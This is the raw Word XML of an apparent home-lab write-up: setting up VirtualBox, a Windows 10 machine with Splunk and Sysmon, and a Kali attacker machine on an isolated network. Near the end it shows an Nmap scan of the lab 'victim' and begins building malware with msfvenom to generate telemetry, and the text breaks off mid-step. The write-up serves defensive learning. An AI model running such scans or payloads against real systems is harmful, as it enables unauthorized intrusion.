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kf6n0lku446d" w:id="0"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Objective</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000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was to create a virtualized cybersecurity lab consisting of:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000003">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Windows 10 virtual machine with Splunk and Sysmon for log analysis.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000004">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Kali Linux virtual machine to act as an attacker system.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000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7x1o419mtpxa" w:id="1"/>
      <w:bookmarkEnd w:id="1"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Tools and Technologies Used</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000006">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>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VirtualBox</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Open-source virtualization software.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000007">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Windows 10 ISO</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: For creating a Windows virtual machine.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000008">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>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Kali Linux ISO</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: For penetration testing.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000009">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>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Splunk &amp; Sysmon</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Security monitoring tools.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000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4114gpo9puxb" w:id="2"/>
      <w:bookmarkEnd w:id="2"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 1: Installing VirtualBox</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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VirtualBox from</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u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">VirtualBox.org</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> that is compatible with my OS in this case Windows.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000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24300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="46"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setup of VirtualBox I keeped the same settings </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000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a6mo8fazswar" w:id="3"/>
      <w:bookmarkEnd w:id="3"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 2: Setting Up the Windows 10 Virtual Machine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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Downloaded the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Windows 10 Media Creation Tool</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and generated a Windows 10 ISO.</w:t>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2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accepted license terms and then chose Create Installation Media. I used to use ISO file media and it was downloaded.</w:t>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Created a new virtual machine in VirtualBox:</w:t>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clicked on New and then.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000015">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="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4GB RAM and 50GB storage.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000016">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="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Mounted the Windows 10 ISO as the boot disk.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000017">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="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Configured network settings for internet access.</w:t>
      </w:r>
    </w:p>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3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2600325"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="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691188" cy="2600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50"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the final configuration. After this I clicked Start and configured time and language settings. On the Windows activation I chose I don't have a Product Key and for the OS I chose Windows 10 Pro. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001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Installed Windows 10 and set up administrative credentials.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001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Installed </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Splunk</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Sysmon</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> for security monitoring.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001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 Downloading Splunk</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001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Step 1:</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4"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Through my web browser I went to</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Splunk’s official website.</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId16">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Fonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">I hovered</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> over Products in the top menu and clicked Splunk Enterprise, clicked Free Trial, signed up for a Splunk account and once signed in, located Splunk Enterprise on the download page. Selected Windows as the operating system and clicked Download, accepted the Terms and Conditions, then clicked Access Program. After that I just waited for the download to complete.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001F">
      <w:pPr>
        <w:spacing w:after="0" w:before="0" w:line="276"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Step 2:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000020">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the installation, I opened File Explorer and navigated to the Downloads folder, where the Splunk installer file is located. Windows security prompts a confirmation, and I clicked Run to proceed with the installation. Upon reaching the License Agreement screen, I review and accept the terms before continuing. The installer will then present an option to use the default installation path or specify a custom location. I decided to continue with the default config and clicked Next. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000021">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before="0" w:line="276"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Step 3:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000023">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configuration phase, the user will be prompted to select an account type. Since this installation is for a local setup, I chose Local System. I assigned a Username and a strong Password. To finalize the setup, I clicked Next and allowed the installation process to run, which may take approximately 5 to 10 minutes. Once completed, the Launch Splunk Enterprise option has to be checked before clicking Finish to complete the installation.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000024">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8823" cy="3671888"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="4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058823"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913" cy="4253279"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="52"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014913" cy="425327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9853" cy="3757613"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="56"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949853"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Downloading Sysmon</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started by downloading Sysmon from the official Microsoft Sysinternals website and chose the Download Sysmon for Windows and downloaded Sysmon configuration from GitHub. After Sysmon was downloaded I extracted it.</w:t>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opened PowerShell as an Administrator and ran </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cd “path of my folder”</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and then I ran </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">dir</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> in order to see the files on the folder and ran </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.\Sysmon64.exe.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> To check if Sysmon was correctly installed, I went into the start menu and clicked Services to see if Sysmon was running on my computer and it was not so I opened PowerShell and ran </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.\Sysmon64.exe -i .\sysmonconfig.xml</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and after I ran this the License and Agreement appeared and Sysmon was successfully downloaded. To make sure Sysmon was running I went into Services again and this confirmed it was running.</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4192" cy="3795713"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="3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044192"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sysmon configuration.</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8581" cy="3526910"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="55"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4858581" cy="352691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4319" cy="3843338"/>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084319"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9866" cy="3784085"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="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39866" cy="378408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9441" cy="4233863"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="4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589441"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4220985"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="2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576888" cy="422098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8285" cy="3757613"/>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928285"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4071724"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="2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138738" cy="407172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3368" cy="3938588"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="5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023368"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Downloading Kali</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went into </w:t>
      </w:r>
      <w:hyperlink r:id="rId29">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Kali.org</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and downloaded Kali for virtual machine</w:t>
      </w:r>
    </w:p>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3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went ahead and downloaded 7zip of 64bit as Kali is a 7zip file extension.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000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everything was downloaded I extracted the Kali file using 7zip, I clicked the Kali folder, chose the VBox file and it was automatically downloaded into VirtualBox.</w:t>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 Home Lab Configuration</w:t>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Default virtual machine settings can pose a risk to the host system when handling malware. To minimize this risk, network configurations must be carefully adjusted.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000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Just to test tools with internet connectivity</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> default settings would work (this would use NAT).</w:t>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using my Home Lab for Malware Analysis is safer not to use an internet connection, be on its own network or not even attach a network adapter to it.</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case for this Home Lab I chose the second option and these are my configurations:</w:t>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Windows 10</w:t>
      </w:r>
    </w:p>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Kali:</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 summary of my configurations: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39"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Kali:</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57"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both machines are on the same network, we need to assign static IP addresses to ensure stable communication and here is how I did it.</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Windows:</w:t>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the globe and then click on Network &amp; Internet settings.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624" cy="3773649"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="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4524624" cy="377364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Clicked on Change adapter options.</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3676157"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="42"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4452938" cy="367615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Double-clicked on Ethernet and then clicked on Properties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1643" cy="4051381"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="13"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821643" cy="405138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Look for Internet Protocol Version 4, Select it and click on Properties.</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57" cy="3910013"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="1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672057"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Switch to Use the following IP address to static assign IP address and Subnet Mask.</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3685289"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="2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367213" cy="368528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order to verify the change, open the command prompt and run ipconfig.</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8213" cy="3984930"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="6"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748213" cy="398493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Kali:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000072">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Clicked in the Ethernet icon and double clicked Wired connection 1</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38613" cy="3527998"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="51"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4138613" cy="352799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IPv4 settings and assigned the following Address and Netmask</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4176713" cy="3627947"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="2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176713" cy="362794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Right-clicked anywhere in the screen and clicked Open Terminal Here and ran ifconfig to make sure changes are saved.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2625" cy="2930686"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="30" name="image44.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image44.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId42"/>
                    <a:srcRect b="37967" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5762625" cy="293068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ping our Kali machine from Windows to confirm connectivity. </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00400"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="1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doing this, I went ahead and started using Nmap to detect any open ports on my victim’s machine. I ran </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">nmap -h.</w:t>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3235486"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="16" name="image20.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image20.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId44"/>
                    <a:srcRect b="37095" l="0" r="1178" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4791075" cy="323548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 ran </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">nmap -A 192.168.20.10 -Pn</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (this is my victim’s IP address).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3933825"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="44" name="image45.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image45.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId45"/>
                    <a:srcRect b="35062" l="0" r="830" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="56864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those ports shown above are the open ports on my victim’s machine, in this case port 135/tcp, 139/tcp, 445/tcp, 8000/tcp.</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noted this information and started creating my malware using the command </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">msfvenom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This time we are not focused on how to build malware to avoid detection, we are focused on generating telemetry to see how it looks on our Windows machine.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008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090988" cy="2738191"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="5" name="image10.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image10.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId46"/>
                    <a:srcRect b="36809" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4090988" cy="273819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And then ran </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
